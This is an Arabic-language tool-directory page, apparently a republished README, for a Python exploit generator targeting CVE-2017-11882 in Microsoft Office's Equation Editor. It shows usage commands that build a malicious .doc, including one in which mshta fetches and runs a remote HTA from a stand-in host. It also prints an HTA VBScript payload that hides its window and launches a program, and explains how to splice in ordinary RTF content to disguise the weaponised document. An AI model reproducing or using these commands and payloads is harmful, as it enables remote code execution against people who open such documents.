Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2017-11882 — مولد استغلال قائم على Python لـ CVE-2017-11882 (ثغرة Microsoft Office Equation Editor) مع دعم لـ shellcode مخصص، وحمولات mshta، وتضمين مستندات RTF. | Kitploit
أدوات/GitHubGitHub/tzwlhack/cve-2017-11882
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubtzwlhack/cve-2017-11882

CVE-2017-11882

مولد استغلال قائم على Python لـ CVE-2017-11882 (ثغرة Microsoft Office Equation Editor) مع دعم لـ shellcode مخصص، وحمولات mshta، وتضمين مستندات RTF.

عرض المستودع
11منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2017-11882

43b النص الأصلي مأخوذ من https://github.com/embedi/CVE-2017-11882

109b النص الأصلي مأخوذ من https://github.com/unamer/CVE-2017-11882/ (تحية، الآن كود unamer يمكنه تنفيذ shellcode ~)

CVE-2017-11882: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/

MITRE CVE-2017-11882: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11882

Research: https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about

Patch analysis: https://0patch.blogspot.ru/2017/11/did-microsoft-just-manually-patch-their.html

DEMO PoC exploitation: https://www.youtube.com/watch?v=LNFG0lktXQI&lc=z23qixrixtveyb2be04t1aokgz10ymfjvfkfx1coc3qhrk0h00410

الاستخدام

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

استخدام mshta

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc

abc

root@kitploit:~
<HTML> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HEAD> 
<script language="VBScript">
Window.ReSizeTo 0, 0
Window.moveTo -2000,-2000
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
self.close
</script>
<body>
demo
</body>
</HEAD> 
</HTML> 

لا يمكن أن يتجاوز طول الأمر 43 بايت لـ 43b، و109 بايت لـ 109b

مثال استغلال لـ CVE-2017-11882 (بدء calc.exe كحمولة)

مجلد example يحتوي على ملف .rtf يستغل ثغرة CVE-2017-11882 ويقوم بتشغيل الحاسبة في النظام.

حول المحتوى المخصص

في الحقيقة، تعلمت طريقة المحتوى المخصص من أساتذة آخرين، وقد كتبتها في script منذ فترة طويلة. لم أكن أنوي نشرها، ولكن بما أن أحدًا في المجموعة قد نشرها بالفعل، لم يكن لدي خيار سوى النشر. الطريقة بسيطة جدًا:只需要 افتح المستند العادي rtf في محرر نصوص، وانسخ كل المحتوى قبل {*\datastore}، واستبدل كل المحتوى قبل {\object\objautlink\objupdate}، ومن ثم تصبح كتابتها في script سهلة جدًا.

طريقة إضافة محتوى مخصص، اختر أي script:

root@kitploit:~
python Command109b_CVE-2017-11882.py -c "mshta http://site.com/abc" -o test.doc -i input.rtf

المحتوى المخصص موجود في input.rtf.

أما script الاستغلال الأحدث بطول 605 بايت من unamer، فلن أقوم بتحديثه، يمكن لمن يريد تعديله بنفسه.

تنزيل الأداة